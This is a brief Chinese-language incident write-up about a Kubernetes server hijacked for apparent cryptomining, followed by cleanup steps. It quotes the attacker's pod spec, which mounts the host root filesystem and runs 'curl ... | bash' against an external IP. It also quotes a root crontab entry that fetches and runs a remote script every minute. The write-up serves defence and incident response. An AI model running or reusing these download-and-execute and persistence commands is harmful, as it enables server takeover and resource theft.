发现服务器CPU占用100%,通过top命令发现pubg -c config.json -t 2占用CPU资源,kill进程会自动启动。黑客入侵方式是kubernetes创建pod。
Name: kube-api-zbplw Namespace: default Node: 120.79.2.25/120.79.2.25 Start Time: Tue, 05 Dec 2017 16:45:03 +0800 Labels: <none> Status: Succeeded IP: 172.17.36.4 Controllers: <none> Containers: centos: Container ID: docker://c293e7063e2f9c38939d24f707cb752a0b76def937b3f30d784fe8202d14b01d Image: centos Image ID: docker-pullable://docker.io/centos@sha256:3b1a65e9a05f0a77b5e8a698d3359459904c2a354dc3b25ae2e2f5c95f0b3667 Port: Command: /bin/sh -c /usr/bin/curl -s http://35.194.156.203/obi.sh | bash -s;sleep 120;cat /mnt/etc/crontab;echo 0 State: Terminated Reason: Completed Exit Code: 0 Started: Wed, 06 Dec 2017 17:03:03 +0800 Finished: Wed, 06 Dec 2017 17:05:03 +0800 Ready: False Restart Count: 0 Volume Mounts: /mnt from hahaha-volume (rw) Environment Variables: <none> Conditions: Type Status Initialized True Ready False PodScheduled True Volumes: hahaha-volume: Type: HostPath (bare host directory volume) Path: / QoS Class: BestEffort Tolerations: <none> Events: FirstSeen LastSeen Count From SubObjectPath Type Reason Message --------- -------- ----- ---- ------------- -------- ------ ------- 1d 24m 287 {kubelet 120.79.2.25} Warning FailedSync Error syncing pod, skipping: failed to "StartContainer" for "POD" with ErrImagePull: "image pull failed for registry.access.redhat.com/rhel7/pod-infrastructure:latest, this may be because there are no credentials on this request. details: (open /etc/docker/certs.d/registry.access.redhat.com/redhat-ca.crt: no such file or directory)"
解决方法
1,删除pod
kubectl delete pod kube-api-zbplw
2,修改crontab配置。
cat /etc/crontab * * * * * root /usr/bin/curl -s http://35.194.156.203/steam.sh | /bin/bash -s
3,关闭crontab,清除crontab配置,再kill pubg进程,问题解决。
service crond stop